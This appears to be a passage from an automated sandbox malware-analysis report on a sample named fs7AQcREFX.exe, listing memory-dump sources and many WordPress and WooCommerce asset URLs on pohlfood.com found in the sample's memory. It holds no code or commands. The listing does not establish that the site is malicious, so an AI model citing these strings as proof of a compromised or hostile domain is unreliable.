                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/pdf.min.js?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/three.min.js?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/tfc-product-catalog/tfc-product-catalog.js?ver=1.0.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/css.css?ver=2.1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/js.js?ver=2.1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/css.css?ver=2.1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/js.js?ver=2.1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/js.min.js?ver=2.1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/css.css?ver=2.1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/js.js?ver=2.1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.7.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.7.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.7.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.7.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-theme-child/style.css?ver=1.0.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=1685382767
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1685382219
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-410.css?ver=1685382219
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-501.css?ver=1685382220
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 